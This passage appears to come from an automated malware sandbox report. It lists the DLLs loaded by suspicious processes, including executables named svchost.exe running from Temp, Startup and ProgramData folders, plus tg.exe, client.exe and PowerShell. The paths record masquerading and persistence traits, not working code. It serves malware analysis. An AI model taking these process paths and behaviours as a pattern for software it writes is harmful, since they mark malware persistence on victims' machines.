        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: pcacli.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d9.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1core.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1core.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: esent.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: mi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: webio.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: es.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exe, Section loaded: mpr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
